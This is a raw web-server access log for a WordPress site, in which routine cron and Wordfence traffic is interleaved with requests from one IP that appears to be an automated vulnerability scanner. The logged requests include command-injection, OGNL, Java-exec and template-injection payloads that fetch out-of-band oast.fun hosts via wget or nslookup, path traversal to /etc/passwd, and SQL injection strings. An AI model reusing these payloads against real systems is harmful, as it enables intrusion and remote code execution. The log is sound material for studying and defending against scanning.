103.4.122.14 - - [13/Jan/2026:23:27:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768318063.0979130268096923828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:27:40 +0800] "GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:27:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768318066.0377440452575683593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:27:43 +0800] "GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:30:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768318252.8774650096893310546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:30:48 +0800] "POST /actuator/gateway/routes/38Btk5cB9nqBwgCKW2QQoYphgtF HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [13/Jan/2026:23:30:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768318259.4227859973907470703125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:30:56 +0800] "POST /actuator/gateway/refresh HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:31:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768318265.2753269672393798828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:31:02 +0800] "DELETE /actuator/gateway/routes/38Btk5cB9nqBwgCKW2QQoYphgtF HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:23:31:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768318278.3185009956359863281250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:31:15 +0800] "GET /vcac/ HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:31:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768318285.2479069232940673828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:31:22 +0800] "GET /vcac/?original_uri=https://nutritaste.com.au%2Fvcac HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:23:31:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768318289.2267169952392578125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:31:26 +0800] "POST /apisix/batch-requests HTTP/1.1" 404 10864 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:31:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768318295.2360301017761230468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:31:32 +0800] "GET /api/38Btk0BqknLhfe9cu0kbZbYfvO3 HTTP/1.1" 404 10882 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:33:06 +0800] "POST /api.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:35:18 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:35:48 +0800] "POST /login.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:36:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768318580.1066429615020751953125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:36:18 +0800] "POST /?wordfence_syncAttackData=1768318578.5335 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:36:16 +0800] "POST /geoserver/wms HTTP/1.1" 404 10860 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:23:36:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768318602.4954559803009033203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:36:39 +0800] "GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://d5iu610i9qj8svou82p0hcu984gwc8bdp.oast.fun;%27 HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:38:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768318695.6971058845520019531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:38:12 +0800] "POST /cgi-bin/nightled.cgi HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:23:38:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768318710.3521289825439453125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:38:27 +0800] "GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://d5iu610i9qj8svou82p0xctmgjhxngya3.oast.fun; HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:38:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768318714.1588640213012695312500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:38:32 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:39:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768318787.5387179851531982421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
194.164.63.41 - - [13/Jan/2026:23:39:43 +0800] "POST /wp-login.php HTTP/1.1" 503 7315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
103.4.122.14 - - [13/Jan/2026:23:42:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768318966.7730689048767089843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:42:43 +0800] "GET /modules/appagebuilder/config.xml HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:42:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768318974.3702449798583984375000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:42:51 +0800] "POST /modules/appagebuilder/apajax.php?rand=6350675549744 HTTP/1.1" 404 10857 "https://nutritaste.com.au" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:23:43:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768318981.3493978977203369140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:42:58 +0800] "POST /modules/appagebuilder/apajax.php?rand=3235606030630 HTTP/1.1" 404 10857 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:23:43:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768318988.2473440170288085937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:43:05 +0800] "POST /modules/appagebuilder/apajax.php?rand=9070466453104 HTTP/1.1" 404 10857 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:43:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768318995.1731469631195068359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:43:12 +0800] "POST /modules/appagebuilder/apajax.php?rand=7001586549945 HTTP/1.1" 404 10857 "https://nutritaste.com.au" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:43:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768319002.1797928810119628906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:43:19 +0800] "POST /modules/appagebuilder/apajax.php?rand=3703032578246 HTTP/1.1" 404 10857 "https://nutritaste.com.au" "Mozilla/5.0 (SS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:23:44:42 +0800] "POST /alerts/alertLightbox.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/109.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:44:50 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:45:02 +0800] "POST /alerts/alertConfigField.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:45:03 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:23:45:11 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:46:03 +0800] "GET /cgi-bin/downloadFlile.cgi?payload=`ls>../38Btk2KLqnvP4MN9ZO1mS5maKKi` HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:46:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768319170.7141571044921875000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:46:07 +0800] "GET /38Btk2KLqnvP4MN9ZO1mS5maKKi HTTP/1.1" 404 10884 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0"
165.232.54.158 - - [13/Jan/2026:23:48:01 +0800] "GET /ucs/micollab/version.json HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [13/Jan/2026:23:48:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768319284.6869819164276123046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:48:01 +0800] "POST /dologin.action HTTP/1.1" 404 10872 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:23:48:26 +0800] "GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1" 403 199 "-" "-"
103.4.122.14 - - [13/Jan/2026:23:48:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768319339.3647449016571044921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:48:56 +0800] "GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.1.15"
103.4.122.14 - - [13/Jan/2026:23:49:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768319369.6129329204559326171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:49:26 +0800] "POST /cms/content/list HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:49:32 +0800] "POST /OASREST/v2/authenticate HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:49:42 +0800] "POST /admin/uploads.php?id=1 HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:51:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768319460.2052409648895263671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:50:58 +0800] "POST /?wordfence_syncAttackData=1768319458.5738 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:50:56 +0800] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 10983 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:51:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768319467.3369328975677490234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:51:04 +0800] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d5iu610i9qj8svou82p04zubyfe6hcgwu.oast.fun%22%29%7D/ HTTP/1.1" 404 10945 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:53:13 +0800] "GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:54:12 +0800] "POST /api/content/ HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:54:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768319660.1570401191711425781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:54:18 +0800] "POST /?wordfence_syncAttackData=1768319658.5599 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:54:16 +0800] "GET /38BtkE17luHDgPrOj8qYR71Exrp.jsp HTTP/1.1" 404 10886 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:54:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768319690.5187959671020507812500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:54:47 +0800] "POST /bonita/loginservice HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:55:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768319718.6931710243225097656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:55:15 +0800] "GET /bitrix/admin/ HTTP/1.1" 404 10858 "-" "Mozilla/5.0 (SS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
165.232.54.158 - - [13/Jan/2026:23:55:56 +0800] "GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:59:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768319975.2868421077728271484375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:59:31 +0800] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:59:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768319982.5072829723358154296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:59:39 +0800] "GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:59:50 +0800] "POST /admin/asign-single-student-subjects.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:59:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768319992.6825239658355712890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:59:51 +0800] "POST /?wordfence_syncAttackData=1768319991.26 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:59:49 +0800] "POST /index.php?owa_do=base.loginForm&owa_site_id HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
165.232.54.158 - - [13/Jan/2026:23:59:51 +0800] "GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:00:00:02 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
103.4.122.14 - - [14/Jan/2026:00:01:04 +0800] "POST /wp-cron.php?doing_wp_cron=1768320064.8224620819091796875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:01:01 +0800] "POST /api/agent/tabs/agentData HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/111.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:00:03:51 +0800] "POST /ubus/ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:00:03:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768320234.8095889091491699218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:03:51 +0800] "GET /page?id=38Btk6pf7hHayBtSX9gyH1ZCKw0&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://d5iu610i9qj8svou82p0qzkq7enexdgt9.oast.fun%27);s HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:00:04:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768320289.6232919692993164062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:04:46 +0800] "POST /x/..//RestAPI/LicenseMgr HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
103.4.122.14 - - [14/Jan/2026:00:05:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768320332.6418840885162353515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:05:29 +0800] "POST /admin/index.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [14/Jan/2026:00:05:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768320339.3287889957427978515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:05:36 +0800] "GET /admin/dashboard.php HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [14/Jan/2026:00:05:39 +0800] "POST /dfsms/index.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:00:05:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768320348.3313601016998291015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:05:45 +0800] "GET /dfsms/add-category.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [14/Jan/2026:00:05:46 +0800] "POST /ccms/index.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
103.4.122.14 - - [14/Jan/2026:00:05:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768320355.3292860984802246093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:05:52 +0800] "GET /ccms/dashboard.php HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:137.0) Gecko/20100101 Firefox/137.0"
165.232.54.158 - - [14/Jan/2026:00:06:53 +0800] "POST /conf_mail.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [14/Jan/2026:00:07:11 +0800] "POST /index.php?q=result&searchfor=advancesearch HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:00:09:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768320595.6807899475097656250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:09:52 +0800] "PUT /v1/agent/check/register HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:00:10:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768320602.4357519149780273437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:09:59 +0800] "PUT /v1/agent/check/deregister/38BtjxTkN8kTZZfjvjvEmC4GTf9 HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [14/Jan/2026:00:10:55 +0800] "POST /ztp/cgi-bin/handler HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:00:10:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768320658.8724389076232910156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:10:55 +0800] "GET /modules/blockwishlist/config.xml HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [14/Jan/2026:00:11:02 +0800] "POST /app/options.py HTTP/1.1" 403 199 "https://nutritaste.com.au/app/login.py" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:00:11:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768320668.4388339519500732421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:00:11:05 +0800] "POST /app/options.py HTTP/1.1" 404 10864 "https://nutritaste.com.au/app/login.py" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
